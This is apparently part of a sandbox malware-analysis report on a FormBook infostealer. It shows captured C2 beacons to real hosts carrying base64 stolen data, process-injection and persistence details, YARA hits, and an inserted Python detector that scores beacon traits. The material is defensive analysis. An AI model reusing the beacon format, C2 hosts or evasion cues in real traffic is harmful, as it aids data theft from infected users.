                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 6b 68 6d 71 47 42 72 78 61 52 34 65 50 34 51 68 2f 31 33 5a 51 65 71 5a 52 33 4f 54 7a 79 41 72 74 4e 4d 57 68 7a 78 47 30 36 77 68 72 31 6a 64 67 4b 65 78 58 71 46 5a 49 54 78 42 59 67 65 56 6a 36 6d 4e 52 5a 45 35 76 66 4d 45 52 4c 53 73 5a 53 41 35 49 39 70 4d 39 7a 7a 4d 66 48 70 64 44 71 2b 33 64 58 6a 52 71 71 74 78 75 33 70 76 57 34 4e 55 39 4d 4b 32 43 70 59 32 63 39 71 4e 43 4d 6b 6d 7a 6b 74 70 4f 70 62 63 76 70 57 47 39 45 78 61 34 42 37 58 43 58 34 35 7a 4d 68 42 4c 56 71 70 47 51 45 5a 66 35 75 73 58 6b 6b 7a 59 43 56 77 7a 7a 4b 30 4b 55 2f 47 2b 46 63 67 64 48 4e 31 45 58 35 78 30 4b 55 4e 5a 39 59 67 4e 47 4a 4f 78 4e 62 4e 30 38 43 66 43 32 30 74 2f 34 48 2b 46 33 43 67 73 38 51 54 50 55 4b 37 42 64 67 68 39 53 76 62 36 37 65 53 48 67 74 38 53 4a 62 6c 46 75 35 45 71 4a 48 30 76 65 33 66 33 4a 38 70 6d 62 55 72 75 6f 68 47 71 34 67 6d 77 55 53 37 48 [TRUNCATED]
Data Ascii: gP=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.11 | 50025 | 43.154.104.247 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:44.974014997 CEST | 457 | OUT | GET /8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8= HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
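
The sessions above all have the same shape: a POST or GET from the persisted copy in Program Files to a short directory path on a rotating set of domains, a single form field gP= carrying raw base64 (the '+' and '/' are not percent-encoded), a GET variant that adds an -L= parameter, an Origin equal to the host, a Referer that points back at the C2 path itself, and a fixed Mac OS X 10.10 / Chrome 42 User-Agent sent from a Windows process. The script below is an added example, not part of the Joe Sandbox report and not FormBook code: it parses raw HTTP requests and scores those traits. The sample requests are constructed from the captures above (hosts, paths, headers and bodies copied from sessions 40 and 41, unused headers dropped) plus one benign form login for contrast; the path regex and the four-indicator threshold are assumptions of the example.

```python
"""Fingerprint FormBook-style HTTP beacons in captured requests.

Added example; not Joe Sandbox or FormBook code. SAMPLES is constructed
from the sessions captured in the report plus one benign POST. The
short-path regex and the four-indicator threshold are assumptions.
"""
import base64
import re

# User-Agent string carried by every request in the report.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # assumption; fits /4est/ and /8qne/
THRESHOLD = 4                                      # assumption


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def form_params(s: str) -> dict:
    """key=value pairs with no percent/plus decoding: the beacons send base64
    '+' and '/' raw, and urllib's parse_qsl would turn '+' into a space."""
    out = {}
    for part in s.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            out[key] = value
    return out


def looks_like_base64(value: str) -> bool:
    if not value or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
        return True
    except ValueError:          # binascii.Error is a ValueError
        return False


def score_request(req: dict) -> dict:
    h, host = req["headers"], req["headers"].get("host", "")
    path, _, query = req["target"].partition("?")
    params = form_params(req["body"] if req["method"] == "POST" else query)
    gp = params.get("gP", "")
    indicators = {
        "fixed_chrome42_mac_ua": h.get("user-agent") == FORMBOOK_UA,
        "self_referer": h.get("referer") == f"http://{host}{path}",
        "origin_is_host": h.get("origin") == f"http://{host}",
        "short_c2_path": bool(SHORT_PATH.match(path)),
        "gP_param": bool(gp),
        "gP_is_base64": looks_like_base64(gp),
        "L_param_in_get": req["method"] == "GET" and "-L" in params,
    }
    hits = [name for name, hit in indicators.items() if hit]
    return {"method": req["method"], "host": host, "path": path,
            "hits": hits, "beacon": len(hits) >= THRESHOLD}


def _req(request_line, headers, body=""):
    return "\r\n".join([request_line, *headers, "", body])


SAMPLES = {
    # Session 41 above: POST /8qne/ to www.nmh6.site (body copied from the capture)
    "post_nmh6": _req("POST /8qne/ HTTP/1.1", [
        "Host: www.nmh6.site", "Content-Type: application/x-www-form-urlencoded",
        "Connection: close", "Content-Length: 199", "Origin: http://www.nmh6.site",
        "Referer: http://www.nmh6.site/8qne/", "User-Agent: " + FORMBOOK_UA],
        "gP=HRrrDXRntJoN31gMh4cEv+kC0NipQHKvZONBmCTBWEohl5OBqXmR+eP4YB/x55QEqZt7OTDIAoBNN3xz"
        "3Es9oBrzndgJexXzFZYXxAt7eUL6mfJZA5vcSURLSsZGA5JupMk0zN3upOrq9SJXsSCt4hu73/X6EGpGP03/"
        "ZnAojua6pHjZqo7obt7lUioQ7JdPug=="),
    # Session 40 above: GET with gP and -L in the query string
    "get_suarahati20": _req(
        "GET /4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5K"
        "DSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6P HTTP/1.1",
        ["Host: www.suarahati20.xyz", "Connection: close", "User-Agent: " + FORMBOOK_UA]),
    # Constructed benign login form post for contrast
    "benign_login": _req("POST /login/ HTTP/1.1", [
        "Host: intranet.example.test", "Content-Type: application/x-www-form-urlencoded",
        "Origin: http://intranet.example.test", "Referer: http://intranet.example.test/signin",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0.0.0"],
        "user=bob&pass=hunter2"),
}


def scan_samples() -> dict:
    return {name: score_request(parse_request(raw)) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(name, "BEACON" if result["beacon"] else "ok", result["hits"])
```

No single indicator is strong on its own (Origin equal to Host is normal for any form post, and a short directory path is common), which is why the verdict needs four of them together; the User-Agent string and the path shape are the fields to tune per sample, since FormBook builds change them.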


                                                                                                      Target ID:0
                                                                                                      Start time:09:53:55
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Z6s208B9QX.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Z6s208B9QX.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1'403'415 bytes
                                                                                                      MD5 hash:09BFD7F979770CDE56456734D6D1FF8D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:09:53:56
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Z6s208B9QX.exe"
Imagebase:0xb30000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:true

Target ID:10
Start time:09:54:33
Start date:08/10/2024
Path:C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe"
Imagebase:0xb30000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:high
Has exited:false

Target ID:11
Start time:09:54:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\write.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\write.exe"
Imagebase:0x750000
File size:10'240 bytes
MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:moderate
Has exited:false

Target ID:13
Start time:09:54:48
Start date:08/10/2024
Path:C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe"
Imagebase:0xb30000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:17
Start time:09:55:00
Start date:08/10/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff6de060000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:9.6%
Total number of Nodes:2000
Total number of Limit Nodes:36
86984->86760 86984->86761 86985 4114c6 87667 417f25 10 API calls _W_expandtime 86985->87667 86987->86789 86988->86791 86989->86796 86990->86796 86992 4026f0 52 API calls 86991->86992 86993 401c97 86992->86993 86993->86920 86994->86924 86995->86922 87056 40f6f0 86996->87056 86998 40f77b _strcat ctype 87064 40f850 86998->87064 87003 427c2a 87093 414d04 87003->87093 87005 40f7fc 87005->87003 87006 40f804 87005->87006 87080 414a46 87006->87080 87010 40f80e 87010->86934 87015 4528bd 87010->87015 87012 427c59 87099 414fe2 87012->87099 87014 427c79 87016 4150d1 _fseek 81 API calls 87015->87016 87017 452930 87016->87017 87599 452719 87017->87599 87020 452948 87020->86936 87021 414d04 __fread_nolock 61 API calls 87022 452966 87021->87022 87023 414d04 __fread_nolock 61 API calls 87022->87023 87024 452976 87023->87024 87025 414d04 __fread_nolock 61 API calls 87024->87025 87026 45298f 87025->87026 87027 414d04 __fread_nolock 61 API calls 87026->87027 87028 4529aa 87027->87028 87029 4150d1 _fseek 81 API calls 87028->87029 87030 4529c4 87029->87030 87031 4135bb _malloc 46 API calls 87030->87031 87032 4529cf 87031->87032 87033 4135bb _malloc 46 API calls 87032->87033 87034 4529db 87033->87034 87035 414d04 __fread_nolock 61 API calls 87034->87035 87036 4529ec 87035->87036 87037 44afef GetSystemTimeAsFileTime 87036->87037 87038 452a00 87037->87038 87039 452a36 87038->87039 87040 452a13 87038->87040 87041 452aa5 87039->87041 87042 452a3c 87039->87042 87043 413748 _free 46 API calls 87040->87043 87045 413748 _free 46 API calls 87041->87045 87605 44b1a9 87042->87605 87046 452a1c 87043->87046 87048 452aa3 87045->87048 87049 413748 _free 46 API calls 87046->87049 87047 452a9d 87050 413748 _free 46 API calls 87047->87050 87048->86936 87051 452a25 87049->87051 87050->87048 87051->86936 87053 431e64 87052->87053 87054 431e6a 87052->87054 87055 414a46 __fcloseall 82 API calls 87053->87055 87054->86937 87055->87054 87057 425de2 87056->87057 87058 40f6fc _wcslen 87056->87058 87057->86998 
87059 40f710 WideCharToMultiByte 87058->87059 87060 40f756 87059->87060 87061 40f728 87059->87061 87060->86998 87062 4115d7 52 API calls 87061->87062 87063 40f735 WideCharToMultiByte 87062->87063 87063->86998 87065 40f85d setSBUpLow _strlen 87064->87065 87067 40f7ab 87065->87067 87112 414db8 87065->87112 87068 4149c2 87067->87068 87127 414904 87068->87127 87070 40f7e9 87070->87003 87071 40f5c0 87070->87071 87075 40f5cd _strcat __write_nolock _memmove 87071->87075 87072 414d04 __fread_nolock 61 API calls 87072->87075 87074 425d11 87076 4150d1 _fseek 81 API calls 87074->87076 87075->87072 87075->87074 87079 40f691 __tzset_nolock 87075->87079 87215 4150d1 87075->87215 87077 425d33 87076->87077 87078 414d04 __fread_nolock 61 API calls 87077->87078 87078->87079 87079->87005 87081 414a52 __mtinitlocknum 87080->87081 87082 414a64 87081->87082 87083 414a79 87081->87083 87355 417f77 46 API calls __getptd_noexit 87082->87355 87085 415471 __lock_file 47 API calls 87083->87085 87090 414a74 __mtinitlocknum 87083->87090 87087 414a92 87085->87087 87086 414a69 87356 417f25 10 API calls _W_expandtime 87086->87356 87339 4149d9 87087->87339 87090->87010 87424 414c76 87093->87424 87095 414d1c 87096 44afef 87095->87096 87592 442c5a 87096->87592 87098 44b00d 87098->87012 87100 414fee __mtinitlocknum 87099->87100 87101 414ffa 87100->87101 87102 41500f 87100->87102 87596 417f77 46 API calls __getptd_noexit 87101->87596 87103 415471 __lock_file 47 API calls 87102->87103 87105 415017 87103->87105 87107 414e4e __ftell_nolock 51 API calls 87105->87107 87106 414fff 87597 417f25 10 API calls _W_expandtime 87106->87597 87109 415024 87107->87109 87598 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87109->87598 87110 41500a __mtinitlocknum 87110->87014 87113 414dd6 87112->87113 87114 414deb 87112->87114 87123 417f77 46 API calls __getptd_noexit 87113->87123 87114->87113 87116 414df2 87114->87116 87125 41b91b 79 API calls 12 library calls 87116->87125 87117 414ddb 87124 417f25 10 API calls 
_W_expandtime 87117->87124 87120 414e18 87121 414de6 87120->87121 87126 418f98 77 API calls 5 library calls 87120->87126 87121->87065 87123->87117 87124->87121 87125->87120 87126->87121 87129 414910 __mtinitlocknum 87127->87129 87128 414923 87183 417f77 46 API calls __getptd_noexit 87128->87183 87129->87128 87132 414951 87129->87132 87131 414928 87184 417f25 10 API calls _W_expandtime 87131->87184 87146 41d4d1 87132->87146 87135 414956 87136 41496a 87135->87136 87137 41495d 87135->87137 87139 414992 87136->87139 87140 414972 87136->87140 87185 417f77 46 API calls __getptd_noexit 87137->87185 87163 41d218 87139->87163 87186 417f77 46 API calls __getptd_noexit 87140->87186 87144 414933 __mtinitlocknum @_EH4_CallFilterFunc@8 87144->87070 87147 41d4dd __mtinitlocknum 87146->87147 87148 4182cb __lock 46 API calls 87147->87148 87160 41d4eb 87148->87160 87149 41d560 87188 41d5fb 87149->87188 87150 41d567 87152 416b04 __malloc_crt 46 API calls 87150->87152 87154 41d56e 87152->87154 87153 41d5f0 __mtinitlocknum 87153->87135 87154->87149 87155 41d57c InitializeCriticalSectionAndSpinCount 87154->87155 87156 41d59c 87155->87156 87157 41d5af EnterCriticalSection 87155->87157 87161 413748 _free 46 API calls 87156->87161 87157->87149 87158 418209 __mtinitlocknum 46 API calls 87158->87160 87160->87149 87160->87150 87160->87158 87191 4154b2 47 API calls __lock 87160->87191 87192 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87160->87192 87161->87149 87164 41d23a 87163->87164 87165 41d255 87164->87165 87177 41d26c __wopenfile 87164->87177 87197 417f77 46 API calls __getptd_noexit 87165->87197 87167 41d421 87170 41d47a 87167->87170 87171 41d48c 87167->87171 87168 41d25a 87198 417f25 10 API calls _W_expandtime 87168->87198 87202 417f77 46 API calls __getptd_noexit 87170->87202 87194 422bf9 87171->87194 87174 41499d 87187 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87174->87187 87175 41d47f 87203 417f25 10 API calls _W_expandtime 87175->87203 87177->87167 
87177->87170 87199 41341f 58 API calls 3 library calls 87177->87199 87179 41d41a 87179->87167 87200 41341f 58 API calls 3 library calls 87179->87200 87181 41d439 87181->87167 87201 41341f 58 API calls 3 library calls 87181->87201 87183->87131 87184->87144 87185->87144 87186->87144 87187->87144 87193 4181f2 LeaveCriticalSection 87188->87193 87190 41d602 87190->87153 87191->87160 87192->87160 87193->87190 87204 422b35 87194->87204 87196 422c14 87196->87174 87197->87168 87198->87174 87199->87179 87200->87181 87201->87167 87202->87175 87203->87174 87207 422b41 __mtinitlocknum 87204->87207 87205 422b54 87206 417f77 __mtinitlocknum 46 API calls 87205->87206 87208 422b59 87206->87208 87207->87205 87209 422b8a 87207->87209 87210 417f25 _W_expandtime 10 API calls 87208->87210 87211 422400 __tsopen_nolock 109 API calls 87209->87211 87214 422b63 __mtinitlocknum 87210->87214 87212 422ba4 87211->87212 87213 422bcb __wsopen_helper LeaveCriticalSection 87212->87213 87213->87214 87214->87196 87218 4150dd __mtinitlocknum 87215->87218 87216 4150e9 87246 417f77 46 API calls __getptd_noexit 87216->87246 87218->87216 87219 41510f 87218->87219 87228 415471 87219->87228 87220 4150ee 87247 417f25 10 API calls _W_expandtime 87220->87247 87227 4150f9 __mtinitlocknum 87227->87075 87229 415483 87228->87229 87230 4154a5 EnterCriticalSection 87228->87230 87229->87230 87232 41548b 87229->87232 87231 415117 87230->87231 87234 415047 87231->87234 87233 4182cb __lock 46 API calls 87232->87233 87233->87231 87235 415067 87234->87235 87236 415057 87234->87236 87241 415079 87235->87241 87249 414e4e 87235->87249 87304 417f77 46 API calls __getptd_noexit 87236->87304 87240 41505c 87248 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87240->87248 87266 41443c 87241->87266 87244 4150b9 87279 41e1f4 87244->87279 87246->87220 87247->87227 87248->87227 87250 414e61 87249->87250 87251 414e79 87249->87251 87305 417f77 46 API calls __getptd_noexit 87250->87305 87252 414139 __stbuf 46 API calls 
87251->87252 87254 414e80 87252->87254 87257 41e1f4 __write 51 API calls 87254->87257 87255 414e66 87306 417f25 10 API calls _W_expandtime 87255->87306 87258 414e97 87257->87258 87259 414f09 87258->87259 87261 414ec9 87258->87261 87265 414e71 87258->87265 87307 417f77 46 API calls __getptd_noexit 87259->87307 87262 41e1f4 __write 51 API calls 87261->87262 87261->87265 87263 414f64 87262->87263 87264 41e1f4 __write 51 API calls 87263->87264 87263->87265 87264->87265 87265->87241 87267 414455 87266->87267 87271 414477 87266->87271 87268 414139 __stbuf 46 API calls 87267->87268 87267->87271 87269 414470 87268->87269 87308 41b7b2 77 API calls 6 library calls 87269->87308 87272 414139 87271->87272 87273 414145 87272->87273 87274 41415a 87272->87274 87309 417f77 46 API calls __getptd_noexit 87273->87309 87274->87244 87276 41414a 87310 417f25 10 API calls _W_expandtime 87276->87310 87278 414155 87278->87244 87280 41e200 __mtinitlocknum 87279->87280 87281 41e223 87280->87281 87282 41e208 87280->87282 87284 41e22f 87281->87284 87287 41e269 87281->87287 87331 417f8a 46 API calls __getptd_noexit 87282->87331 87333 417f8a 46 API calls __getptd_noexit 87284->87333 87285 41e20d 87332 417f77 46 API calls __getptd_noexit 87285->87332 87311 41ae56 87287->87311 87289 41e234 87334 417f77 46 API calls __getptd_noexit 87289->87334 87292 41e26f 87294 41e291 87292->87294 87295 41e27d 87292->87295 87293 41e23c 87335 417f25 10 API calls _W_expandtime 87293->87335 87336 417f77 46 API calls __getptd_noexit 87294->87336 87321 41e17f 87295->87321 87299 41e215 __mtinitlocknum 87299->87240 87300 41e289 87338 41e2c0 LeaveCriticalSection __unlock_fhandle 87300->87338 87301 41e296 87337 417f8a 46 API calls __getptd_noexit 87301->87337 87304->87240 87305->87255 87306->87265 87307->87265 87308->87271 87309->87276 87310->87278 87312 41ae62 __mtinitlocknum 87311->87312 87313 41aebc 87312->87313 87314 4182cb __lock 46 API calls 87312->87314 87315 41aec1 EnterCriticalSection 87313->87315 87316 41aede 
__mtinitlocknum 87313->87316 87317 41ae8e 87314->87317 87315->87316 87316->87292 87318 41aeaa 87317->87318 87319 41ae97 InitializeCriticalSectionAndSpinCount 87317->87319 87320 41aeec ___lock_fhandle LeaveCriticalSection 87318->87320 87319->87318 87320->87313 87322 41aded __chsize_nolock 46 API calls 87321->87322 87323 41e18e 87322->87323 87324 41e1a4 SetFilePointer 87323->87324 87325 41e194 87323->87325 87326 41e1bb GetLastError 87324->87326 87328 41e1c3 87324->87328 87327 417f77 __mtinitlocknum 46 API calls 87325->87327 87326->87328 87329 41e199 87327->87329 87328->87329 87330 417f9d __dosmaperr 46 API calls 87328->87330 87329->87300 87330->87329 87331->87285 87332->87299 87333->87289 87334->87293 87335->87299 87336->87301 87337->87300 87338->87299 87340 4149ea 87339->87340 87341 4149fe 87339->87341 87385 417f77 46 API calls __getptd_noexit 87340->87385 87343 4149fa 87341->87343 87345 41443c __flush 77 API calls 87341->87345 87357 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87343->87357 87344 4149ef 87386 417f25 10 API calls _W_expandtime 87344->87386 87346 414a0a 87345->87346 87358 41d8c2 87346->87358 87350 414139 __stbuf 46 API calls 87351 414a18 87350->87351 87362 41d7fe 87351->87362 87353 414a1e 87353->87343 87354 413748 _free 46 API calls 87353->87354 87354->87343 87355->87086 87356->87090 87357->87090 87359 414a12 87358->87359 87360 41d8d2 87358->87360 87359->87350 87360->87359 87361 413748 _free 46 API calls 87360->87361 87361->87359 87363 41d80a __mtinitlocknum 87362->87363 87364 41d812 87363->87364 87365 41d82d 87363->87365 87402 417f8a 46 API calls __getptd_noexit 87364->87402 87367 41d839 87365->87367 87370 41d873 87365->87370 87404 417f8a 46 API calls __getptd_noexit 87367->87404 87368 41d817 87403 417f77 46 API calls __getptd_noexit 87368->87403 87373 41ae56 ___lock_fhandle 48 API calls 87370->87373 87372 41d83e 87405 417f77 46 API calls __getptd_noexit 87372->87405 87376 41d879 87373->87376 87374 41d81f __mtinitlocknum 87374->87353 87379 
41d893 87376->87379 87380 41d887 87376->87380 87377 41d846 87406 417f25 10 API calls _W_expandtime 87377->87406 87407 417f77 46 API calls __getptd_noexit 87379->87407 87387 41d762 87380->87387 87383 41d88d 87408 41d8ba LeaveCriticalSection __unlock_fhandle 87383->87408 87385->87344 87386->87343 87409 41aded 87387->87409 87389 41d7c8 87422 41ad67 47 API calls 2 library calls 87389->87422 87391 41d772 87391->87389 87392 41d7a6 87391->87392 87395 41aded __chsize_nolock 46 API calls 87391->87395 87392->87389 87393 41aded __chsize_nolock 46 API calls 87392->87393 87396 41d7b2 CloseHandle 87393->87396 87394 41d7d0 87397 41d7f2 87394->87397 87423 417f9d 46 API calls 3 library calls 87394->87423 87398 41d79d 87395->87398 87396->87389 87399 41d7be GetLastError 87396->87399 87397->87383 87401 41aded __chsize_nolock 46 API calls 87398->87401 87399->87389 87401->87392 87402->87368 87403->87374 87404->87372 87405->87377 87406->87374 87407->87383 87408->87374 87410 41ae12 87409->87410 87411 41adfa 87409->87411 87413 417f8a __read_nolock 46 API calls 87410->87413 87416 41ae51 87410->87416 87412 417f8a __read_nolock 46 API calls 87411->87412 87414 41adff 87412->87414 87415 41ae23 87413->87415 87417 417f77 __mtinitlocknum 46 API calls 87414->87417 87418 417f77 __mtinitlocknum 46 API calls 87415->87418 87416->87391 87419 41ae07 87417->87419 87420 41ae2b 87418->87420 87419->87391 87421 417f25 _W_expandtime 10 API calls 87420->87421 87421->87419 87422->87394 87423->87397 87425 414c82 __mtinitlocknum 87424->87425 87426 414cc3 87425->87426 87427 414cbb __mtinitlocknum 87425->87427 87433 414c96 setSBUpLow 87425->87433 87428 415471 __lock_file 47 API calls 87426->87428 87427->87095 87430 414ccb 87428->87430 87437 414aba 87430->87437 87431 414cb0 87452 417f25 10 API calls _W_expandtime 87431->87452 87451 417f77 46 API calls __getptd_noexit 87433->87451 87438 414af2 87437->87438 87442 414ad8 setSBUpLow 87437->87442 87453 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87438->87453 
87439 414ae2 87504 417f77 46 API calls __getptd_noexit 87439->87504 87441 414b2d 87441->87438 87445 414c38 setSBUpLow 87441->87445 87447 414139 __stbuf 46 API calls 87441->87447 87454 41dfcc 87441->87454 87484 41d8f3 87441->87484 87506 41e0c2 46 API calls 4 library calls 87441->87506 87442->87438 87442->87439 87442->87441 87507 417f77 46 API calls __getptd_noexit 87445->87507 87447->87441 87449 414ae7 87505 417f25 10 API calls _W_expandtime 87449->87505 87451->87431 87452->87427 87453->87427 87455 41dfd8 __mtinitlocknum 87454->87455 87456 41dfe0 87455->87456 87457 41dffb 87455->87457 87577 417f8a 46 API calls __getptd_noexit 87456->87577 87458 41e007 87457->87458 87464 41e041 87457->87464 87579 417f8a 46 API calls __getptd_noexit 87458->87579 87461 41dfe5 87578 417f77 46 API calls __getptd_noexit 87461->87578 87463 41e00c 87580 417f77 46 API calls __getptd_noexit 87463->87580 87466 41e063 87464->87466 87467 41e04e 87464->87467 87469 41ae56 ___lock_fhandle 48 API calls 87466->87469 87582 417f8a 46 API calls __getptd_noexit 87467->87582 87472 41e069 87469->87472 87470 41e014 87581 417f25 10 API calls _W_expandtime 87470->87581 87471 41e053 87583 417f77 46 API calls __getptd_noexit 87471->87583 87475 41e077 87472->87475 87476 41e08b 87472->87476 87474 41dfed __mtinitlocknum 87474->87441 87508 41da15 87475->87508 87584 417f77 46 API calls __getptd_noexit 87476->87584 87480 41e083 87586 41e0ba LeaveCriticalSection __unlock_fhandle 87480->87586 87481 41e090 87585 417f8a 46 API calls __getptd_noexit 87481->87585 87485 41d900 87484->87485 87488 41d915 87484->87488 87590 417f77 46 API calls __getptd_noexit 87485->87590 87487 41d905 87591 417f25 10 API calls _W_expandtime 87487->87591 87490 41d94a 87488->87490 87495 41d910 87488->87495 87587 420603 87488->87587 87492 414139 __stbuf 46 API calls 87490->87492 87493 41d95e 87492->87493 87494 41dfcc __read 59 API calls 87493->87494 87496 41d965 87494->87496 87495->87441 87496->87495 87497 414139 __stbuf 46 API calls 87496->87497 
